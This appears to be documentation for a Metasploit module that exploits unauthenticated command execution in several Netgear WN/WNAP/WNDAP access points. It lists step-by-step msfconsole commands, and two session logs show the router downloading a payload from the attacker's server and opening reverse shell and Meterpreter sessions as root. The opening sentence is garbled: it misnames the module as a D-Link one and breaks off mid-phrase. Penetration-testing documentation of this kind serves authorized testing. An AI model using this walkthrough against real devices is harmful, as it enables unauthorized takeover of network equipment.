metasploit-gs/documentation/modules/exploit/linux/http/netgear_unauth_exec.md

The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary command execution vulnerability to. Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 are vulnerable. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).

Vulnerable Application

1. Start msfconsole
2. Do : use exploit/linux/http/netgear_unauth_exec
3. Do : set RHOST [RouterIP]
4. Do : set SRVHOST [Your server's IP]
5. Do : set LHOST [Your IP]
6. Do : set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp if you want meterpreter session
7. Do : exploit
8. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session

Example with default payload (linux/mipsbe/shell_reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
[*] Sending the payload to the server...
[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
[+] Deleted /tmp/IXjlVHwcHNUELM

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
whoami
root

Example with meterpreter (linux/mipsbe/meterpreter/reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
[*] Sending the payload to the server...
[*] Sending stage (1108408 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
[+] Deleted /tmp/UcyqnUAGQ

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.0.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >